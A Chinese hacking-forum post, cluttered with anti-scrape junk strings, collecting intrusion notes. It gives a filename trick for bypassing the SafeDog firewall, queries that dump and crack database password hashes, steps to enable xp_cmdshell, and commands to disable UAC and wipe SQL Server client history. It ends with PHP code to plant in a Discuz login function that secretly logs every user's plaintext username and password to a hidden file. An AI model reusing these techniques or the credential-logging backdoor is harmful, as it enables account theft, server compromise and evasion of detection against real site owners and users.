其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录% C n2 n$ f4 _- R
利用II6文件解析漏洞绕过安全狗代码:
" M `& G! w6 `8 O# K) p, j;antian365.asp;antian365.jpg, z7 B, m3 H. ~1 a# @
- G+ Y( T% Y* s各种类型数据库抓HASH破解最高权限密码!
" o1 o' _9 T! `/ _2 c+ N% a1.sql server2000
- R8 L' y5 e0 N5 S: s) P" e5 Y9 V: {+ uSELECT password from master.dbo.sysxlogins where name='sa'7 U$ q V( ~. Y9 {, i4 x
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341& d' P4 v ~& r$ P( ]
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A# M9 U6 ?3 O- h+ w' v) M: w7 N
) ]: y. b4 x1 V& @8 I9 e# e% ^" p0×0100- constant header' S) H3 D8 R5 ~/ ]' O
34767D5C- salt
D. e& h' ]# d( O* B7 V0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
( n" ] k! Q+ F$ K! a2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash+ D1 m$ A% i3 m
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash# [, |+ N9 l' j( ^( b) b/ U" A. H
SQL server 2005:-6 `2 {2 |4 Z: s% B, U
SELECT password_hash FROM sys.sql_logins where name='sa'
7 Q9 D0 K9 W$ t. J0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F; R. O+ I* S& o0 f% h& a7 g! {
0×0100- constant header# w0 e. `0 R6 v! r+ F* f9 n) g
993BF231-salt
, g- L, ?; H4 U- K3 C9 H5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
$ N' n" z/ o0 _3 ]+ Pcrack case sensitive hash in cain, try brute force and dictionary based attacks.
/ Z, \$ C$ m7 m2 z% w$ U( S
$ q- ]6 I# [4 A- z5 k2 N. R( S& cupdate:- following bernardo’s comments:-* c/ M7 t, N' V. f0 \0 A
use function fn_varbintohexstr() to cast password in a hex string.
8 ~1 S2 H% F1 F j( De.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
+ W+ J: w9 a- U S
' h5 j$ |% d( ]+ b0 ]: G. N& D* KMYSQL:-
3 q3 D) b5 `, V" z
3 t p6 |- l0 k- h# LIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
. z& [& A. U- }2 {7 J2 Y1 k1 n2 Y2 w
- S+ D( J9 ~$ y; G' Z! z, N*mysql < 4.1
- h, {* u2 Z9 @& z1 Z
$ w! A& R9 C0 H4 M* a! q' gmysql> SELECT PASSWORD(‘mypass’);' c, |* K& C1 \/ |( K' ^
+——————–+
" O, E; i3 W# I# x# r$ `+ `| PASSWORD(‘mypass’) |
! L- f5 x/ E6 } s$ T+——————–+
' u5 w5 J V' Q, j| 6f8c114b58f2ce9e |- U- s2 m% H4 L4 \! g
+——————–+" U N) q* U: I) g+ c: P
- d( a' P$ \* ` ^ v
*mysql >=4.1* H9 ~# O Q) W% n* _1 K
+ R/ Y) a: K. `3 N: zmysql> SELECT PASSWORD(‘mypass’);& ]1 \$ t8 r% ]. n3 t$ w8 \
+——————————————-+
& G' g5 g& c- Z; F' y9 W. b| PASSWORD(‘mypass’) |
6 i7 \2 d5 i% _9 E1 a+——————————————-+
" v8 N5 a3 e' p% G. G J| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
: a" |# D3 c8 O+ x e; y8 f+——————————————-+
$ W" V3 m" q" _# C# l& \& D! t
1 ]: i# c1 O. d) GSelect user, password from mysql.user
! c+ g1 ^2 |8 G+ R6 ZThe hashes can be cracked in ‘cain and abel’
, | \) ~% k, P( d2 I2 P- B$ K6 G3 O" T' | S4 c6 W
Postgres:-, a7 ?! s: x; s/ A3 M
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”) Y& P# [; G0 D
select usename, passwd from pg_shadow;
% J) t( r( v; Z: j7 M% Gusename | passwd
, O/ |: D7 M) _ B- r$ R——————+————————————-1 x/ y c1 l1 \5 A) j8 B
testuser | md5fabb6d7172aadfda4753bf0507ed4396
( _4 U* P) j* J8 \- |5 Uuse mdcrack to crack these hashes:-1 T8 b* G4 e2 z: S$ y- f
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
# F8 r! x3 g( A7 [" A
b) C. L, M2 B5 m* UOracle:-
! ^; o r3 x, k# |/ _/ ]" Pselect name, password, spare4 from sys.user$
6 C3 B6 F. J, D1 j( t& whashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
8 x2 B6 Y; l3 d. T; `: CMore on Oracle later, i am a bit bored….8 c# k+ J6 r, z2 G* o! ^, A8 l
8 C2 I8 j8 h% B* f7 W/ i0 Q. Z. u- \) U) b; u) a- D+ D- g% F
在sql server2005/2008中开启xp_cmdshell& ]( r% ^5 w, x* Y/ b# m( p
-- To allow advanced options to be changed.
. q3 ^+ D2 |7 ?EXEC sp_configure 'show advanced options', 11 I' B) q n- o
GO
: B7 N5 p, a! r6 o, Y* i-- To update the currently configured value for advanced options.+ K$ D1 ^' [4 }
RECONFIGURE
+ S9 d s) F8 m- R2 Z9 @; TGO* ?+ ?$ v9 x, q, i
-- To enable the feature.
9 |* Y6 B, o; \! A5 N) }EXEC sp_configure 'xp_cmdshell', 1
" D) j) W: d/ e7 dGO
! J9 X$ y" {2 g# x( N2 f- M-- To update the currently configured value for this feature.
; X, I, v1 ~! Q3 _$ V) `; R, ]RECONFIGURE
, z6 k$ k$ l- I: s5 iGO0 Q! ^1 d$ k* i' i0 \4 C
SQL 2008 server日志清除,在清楚前一定要备份。" X) O& P ?0 h. g3 r8 ^
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
& b! k; e4 c! X& k3 I8 eX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
. s1 O' d% x. z$ Q
1 y& D( M) k A* Q; q# M5 q( |5 H对于SQL Server 2008以前的版本:
9 Y Y! W+ c( V$ {# ]( DSQL Server 2005:9 z/ T3 I5 g/ {( a7 k# t9 M. `
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat0 I, F j! |) [: I) A7 v
SQL Server 2000:
% p& Q7 _( m. ~. l( x5 O1 L* j" n清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。8 w' ]/ e, ~5 P0 p! C
8 K% i: ?% n* B' h
本帖最后由 simeon 于 2013-1-3 09:51 编辑
1 V2 E# G# M& ` L7 Q- N5 w2 ]8 d
( Y; e W& g* w1 {windows 2008 文件权限修改
2 s! v3 ?. q( I" @/ O1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
( p+ C1 Y- r7 T! k" F2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98) A' M' P+ ~' X! T
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,4 u* L6 ^- P* l" F D
?" d+ w3 ?6 d" ?( ^4 D' {
Windows Registry Editor Version 5.009 r. J) Y2 x% v- [/ e7 t
[HKEY_CLASSES_ROOT\*\shell\runas]
! N' ~1 d( y- p, `4 T@="管理员取得所有权"8 t- P% _& Q7 A* l$ Q
"NoWorkingDirectory"=""+ M# H; C. y r3 ^; K& Z7 |
[HKEY_CLASSES_ROOT\*\shell\runas\command]" E/ p( T) V8 w% C, c* V
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 j% m, @! _+ V9 d! t"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"7 P' m4 n# C0 Y" A( e1 ]" Z
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
! A2 f$ d& t% v@="管理员取得所有权"
0 M e; Q5 S1 w1 F2 [, v/ `"NoWorkingDirectory"=""
* T" M- `" \4 ~[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
1 n$ y% l+ z, S0 N@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"& ?( @& i ^6 ^2 m
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
% Y/ Y2 H! D* @% W o; V$ J1 h
[HKEY_CLASSES_ROOT\Directory\shell\runas]
9 N% u: ]4 E- E# h: K@="管理员取得所有权"
3 w- Z1 \+ D3 D% M8 p. R6 u) D"NoWorkingDirectory"=""9 i7 l$ J% s5 P* Z4 K& T
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
9 w& [1 _8 h: O$ e0 R@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
+ `$ n+ b+ t; T* U9 A. ~"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
9 N5 t ^ O" z5 @& R! |4 M6 ~ e% X- w
4 ^" G( a/ n H0 _* l5 k2 P% Q; a
win7右键“管理员取得所有权”.reg导入0 n3 Q: ?0 m+ x
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,; Q0 O' K+ F, z' y4 z( v* }9 b
1、C:\Windows这个路径的“notepad.exe”不需要替换
5 h% N( d* l: ^! O. @. P! W$ {, Y2、C:\Windows\System32这个路径的“notepad.exe”不需要替换" ~, P8 ^8 k5 F' C7 f k
3、四个“notepad.exe.mui”不要管' B$ g+ ?4 h; }9 F
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和! a$ H% y: Y$ Z
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”. k" p. G4 f0 [3 N& l* e& c
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,' J* s5 w# |3 ^+ s$ r: N
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
& E/ t0 ~# T$ }: l0 Uwindows 2008中关闭安全策略: % K) J$ o( d+ Q
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
P8 J/ ?) o+ u7 C1 P' g修改uc_client目录下的client.php 在
2 }) b- Y+ i P" u8 \5 m" Wfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
% m, ^2 u C/ y( x下加入如上代码,在网站./data/cache/目录下自动生成csslog.php2 i4 @2 d" B2 d" d* m9 d
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw. T/ _! D3 e/ d5 P# C7 n# L
if(getenv('HTTP_CLIENT_IP')) {
, b7 s" m K2 }( y6 n, K$onlineip = getenv('HTTP_CLIENT_IP');
: E' }5 O! Z. D2 e) w} elseif(getenv('HTTP_X_FORWARDED_FOR')) {* M# `/ J$ ?, l4 n
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
5 U/ |$ k1 W7 {; z' C+ k/ V& E, V) ]} elseif(getenv('REMOTE_ADDR')) {
0 U% r5 a4 r, V3 g& r5 Y( T( C$onlineip = getenv('REMOTE_ADDR');4 V% D# p- o) ?4 Z8 V# j9 e! L, H4 A
} else {5 z& o; F! g" S; o, x" q
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];+ a3 n# p) O+ W/ S) R
}
& L& l5 E# W0 [. k9 [4 L* A$ h $showtime=date("Y-m-d H:i:s");
: J* l# B8 v: K7 d- ] $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";. L, J7 [ K( F8 z2 }0 s
$handle=fopen('./data/cache/csslog.php','a+');
: F' ?% d2 g. l) {* ` $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对